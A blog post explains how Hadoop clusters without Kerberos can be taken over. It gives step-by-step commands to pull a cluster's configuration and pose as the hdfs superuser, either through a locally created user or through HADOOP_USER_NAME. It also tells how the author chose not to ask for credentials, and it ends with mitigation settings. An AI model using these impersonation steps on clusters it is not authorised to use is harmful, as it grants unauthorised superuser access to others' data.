Hadoop and no auth?
3 min read · September 14, 2020
Tags: hadoop, hack, hdfs, yarn, security, authentication
Have you set up a Hadoop cluster without enabling authentication (Kerberos) for it? You definitely need to read this.
Recently I was working with an engineer who was setting up an HBase cluster and restoring some data into it. He uploaded the data to HDFS, set up the HBase data directory configuration, and booted HBase. But HBase started complaining as follows:
```
Caused by: org.apache.hadoop.ipc.RemoteException(org.apache.hadoop.security.AccessControlException): Permission denied: user=userB, access=WRITE, inode="/foo/bar/hbase":userA:groupZ:drwxr-xr-x
```
So HMaster is not able to read the files in the `/foo/bar/hbase` directory as `userB`, because the files are owned by `userA`.
As we were working remotely, I was supposed to ask him for the credentials of a Hadoop node from where I could change the owner of these files. But I didn't. I knew that the HDFS cluster was insecure, and I had the Hadoop binaries on my machine, so I just pointed my Hadoop tools at his HDFS cluster. Here is how:
- Download the configuration from his cluster:

```
$ whoami
mmp
$ mkdir /tmp/newconf
$ cd /tmp/newconf
$ wget http://hdfs.node.com:50070/conf   # namenode HTTP URL
```
- Make copies under the file names that Hadoop tools load by default:

```
$ cp conf hdfs-site.xml
$ cp conf yarn-site.xml
$ cp conf core-site.xml
$ cp conf mapred-site.xml
$ chmod -R 777 /tmp/newconf   # let others use them ;)
```
- Point the tools to this new directory:

```
$ export HADOOP_CONF_DIR=/tmp/newconf
```
- Run the tools:

```
$ hdfs dfs -chown -R userB:groupY /foo/bar/hbase
chown: changing ownership of '/foo/bar/hbase': Permission denied. user=mmp is not the owner of inode=hbase
```
- Since I had logged in as `mmp`, the tools I was running were acting as `mmp`. So I created `userA` on my local machine:

```
$ useradd userA
$ sudo su - userA
[userA@localhost]$ export HADOOP_CONF_DIR=/tmp/newconf
[userA@localhost]$ hdfs dfs -chown -R userB:groupY /foo/bar/hbase
chown: changing ownership of '/foo/bar/hbase': Non-super user cannot change owner
```
- Now, `userA` was not defined as a superuser in the HDFS configuration, so I couldn't run this `chown` as `userA`. But the `hdfs` user definitely can:

```
$ useradd hdfs
$ sudo su - hdfs
[hdfs@localhost]$ export HADOOP_CONF_DIR=/tmp/newconf
[hdfs@localhost]$ hdfs dfs -chown -R userB:groupY /foo/bar/hbase
[hdfs@localhost]$ hdfs dfs -ls /foo/bar/hbase
Found 4 items
drwxr-xr-x   - userB groupY          0 2020-09-09 22:05 /foo/bar/hbase
...
```
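There is an even shorter variant of this trick that, as far as I know, works against any simple-auth cluster without creating a local user at all: the Hadoop client trusts the `HADOOP_USER_NAME` environment variable, so you can claim to be any user in a single export. A hypothetical session (same hedge as above: this assumes the cluster has no Kerberos) would look like:

```
$ export HADOOP_CONF_DIR=/tmp/newconf
$ export HADOOP_USER_NAME=hdfs          # claim to be the HDFS superuser
$ hdfs dfs -chown -R userB:groupY /foo/bar/hbase
```

No `useradd`, no `sudo su` — the client simply reports whatever name the variable holds.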
Conclusion
- If you have an insecure cluster, it's open to attacks. Attackers can act as any user by:
  - Logging in as the required user on their own machine and connecting to your cluster.
  - Setting the `HADOOP_USER_NAME` environment variable to whatever value they want (e.g. `hdfs` or `yarn`, which are superusers).
- I have even seen Hadoop clusters on the cloud attacked to mine bitcoins, so securing your clusters with an authentication mechanism such as Kerberos can help protect your resources (memory and CPU).
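For reference, moving a cluster away from this trust-the-client mode starts with two properties in `core-site.xml`. This is only a minimal sketch of the switch itself — a full Kerberos setup also needs a KDC, plus principals and keytabs for every service:

```xml
<!-- core-site.xml: stop trusting whatever username the client claims -->
<property>
  <name>hadoop.security.authentication</name>
  <value>kerberos</value> <!-- the default, "simple", is what made the trick above work -->
</property>
<property>
  <name>hadoop.security.authorization</name>
  <value>true</value>
</property>
```

With these in place, the `HADOOP_CONF_DIR` and `HADOOP_USER_NAME` tricks stop working: clients must present a valid Kerberos ticket before the NameNode will talk to them.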